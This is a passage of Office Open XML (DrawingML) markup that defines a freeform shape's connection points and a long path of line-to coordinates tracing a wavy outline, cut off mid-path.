                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2242" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2246" y="121"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2201" y="66"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2128" y="106"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2056" y="171"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1995" y="194"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1914" y="150"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1838" y="125"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1756" y="137"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1680" y="171"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1609" y="226"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1537" y="306"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1457" y="338"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1359" y="270"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1252" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1186" y="175"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1106" y="175"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="1024" y="201"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="950" y="258"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="883" y="327"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="804" y="395"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="697" y="395"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="612" y="321"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="564" y="247"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="517" y="163"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2246" h="671">
                  <a:moveTo>
                    <a:pt x="496" y="119"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="494" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488" y="112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446" y="70"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420" y="51"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="13"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="309" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304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70" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="3"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190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71" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="61"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64" y="64"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="146"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2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0" y="196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0" y="211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97" y="355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332" y="382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347" y="384"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403" y="401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422" y="411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427" y="414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435" y="418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439" y="424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446" y="430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452" y="433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458" y="437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463" y="443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469" y="449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475" y="454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479" y="458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490" y="471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513" y="498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526" y="517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536" y="528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="539" y="532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547" y="544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553" y="549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557" y="555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560" y="559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564" y="565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568" y="568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576" y="578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596" y="603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602" y="610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610" y="618"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617" y="624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="655" y="648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665" y="654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678" y="658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="748" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="754" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="766" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="773" y="671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785" y="669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="790" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804" y="667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815" y="665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826" y="663"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="834" y="662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840" y="660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="845" y="658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="851" y="656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857" y="654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863" y="652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="870" y="650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874" y="646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="880" y="644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="885" y="641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891" y="637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="901" y="631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="912" y="624"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="916" y="620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="921" y="616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925" y="612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="931" y="608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935" y="605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="940" y="601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946" y="597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="952" y="593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="959" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="973" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982" y="563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988" y="559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1005" y="542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011" y="538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015" y="534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020" y="530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024" y="527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032" y="519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1041" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051" y="506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068" y="494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1077" y="488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1083" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1087" y="483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098" y="479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1102" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1108" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1112" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1117" y="471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1123" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1146" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1151" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1157" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1176" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1182" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1189" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1193" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207" y="464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1214" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1220" y="466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1227" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235" y="468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243" y="469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1248" y="471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1262" y="473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271" y="475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1277" y="477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284" y="479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292" y="481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300" y="483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1305" y="485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1313" y="487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1319" y="488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326" y="492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332" y="494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1340" y="496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347" y="500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1355" y="502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360" y="504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1366" y="508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1372" y="509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1385" y="515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391" y="519"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395" y="521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1402" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410" y="528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1419" y="534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427" y="540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435" y="546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1442" y="549"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456" y="561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1463" y="566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469" y="568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1475" y="572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482" y="576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1490" y="580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1501" y="584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518" y="587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1530" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1535" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1539" y="585"/>
                  </a:lnTo>
                  <a:lnTo>
